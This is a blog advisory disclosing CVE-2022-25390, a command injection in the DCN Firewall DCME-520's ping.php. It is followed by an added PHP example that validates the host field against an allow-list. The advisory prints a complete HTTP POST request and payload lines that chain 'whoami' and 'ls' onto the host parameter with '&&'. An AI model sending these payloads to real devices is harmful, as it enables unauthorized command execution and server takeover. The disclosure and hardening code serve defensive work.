CVE-2022-25390: DCN Firewall DCME-520 has a Command Execution vulnerability – Adminxe's Blog
DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.
**0x00 Affected component(s)**
Affected: DCN Firewall DCME-520
Affected source code file: /www/function/system/tool/ping.php
**0x01 Vendor of the product(s) and vulnerability type**
http://www.digitalchina.com/
Command Execution
**0x02 Attack vector(s)**
The vulnerable file path is '/function/system/tool/ping.php'.
The 'host' parameter passed in is not strictly filtered.
It is passed directly into the command line, and the filtering is bypassed with the payload (&&),
resulting in a command execution vulnerability
that can be used to obtain server permissions.
**0x03 Suggest**
An issue was discovered in DCN Firewall DCME-520.
There is a command execution vulnerability that allows any harmful command to be executed on the server in order to control the server.
**0x04 Source code analysis**
path:
/function/system/tool/ping.php
The 'host' parameter passed in is not strictly filtered.
It is passed directly into the command line, and the filtering is bypassed with the payload (&&),
resulting in a command execution vulnerability.
Command Execution Packet:
POST /function/system/tool/ping.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/function/system/tool/ping.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UILanguage=2; PHPSESSID=62913043f1317aec7e2b041dd895ba4b
Connection: close

dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami&proto=&count=1
payload:
host=114.114.114.114&&whoami
host=114.114.114.114&&ls
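
A hardened form of the input handling described above, as an added example that is not from the original post or the vendor's code. The function names, and the assumption that ping.php builds a shell command string from the POSTed host and count fields, are hypothetical.

```php
<?php
// Added example: hypothetical hardened handler, not the vendor's ping.php.
// Assumption: the original concatenates $_POST['host'] into a shell command.

/** Return the host if it is a literal IP or a plain hostname, else null. */
function validate_ping_host($raw)
{
    $host = trim((string) $raw);
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // Allow-list: labels of letters, digits and inner hyphens only.
    // The D modifier stops '$' from matching before a trailing newline.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^' . $label . '(?:\.' . $label . ')*$/D', $host) === 1) {
        return $host;
    }
    return null;
}

/** Accept only an integer echo count in a small range; default to 1. */
function validate_ping_count($raw)
{
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1, 'max_range' => 10)));
    return $n === false ? 1 : $n;
}

function run_ping($rawHost, $rawCount)
{
    $host = validate_ping_host($rawHost);
    if ($host === null) {
        return array('ok' => false, 'output' => array('invalid host'));
    }
    $count = validate_ping_count($rawCount);
    // escapeshellarg() is defence in depth: the allow-list already rejects
    // '&', ';', '|', '$', backticks, whitespace and a leading '-'.
    $cmd = 'ping -c ' . $count . ' ' . escapeshellarg($host);
    exec($cmd, $output, $status);
    return array('ok' => $status === 0, 'output' => $output);
}

// Constructed inputs: a plain address, then the payload shape from this advisory.
var_dump(validate_ping_host('114.114.114.114'));
var_dump(validate_ping_host('114.114.114.114&&whoami'));
```

Validating against an allow-list before the value reaches the shell means the handler rejects the request outright instead of relying on a filter that enumerates bad characters.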
Please credit the source when reposting: Adminxe's Blog » DCN Firewall DCME-520 has a Command Execution vulnerability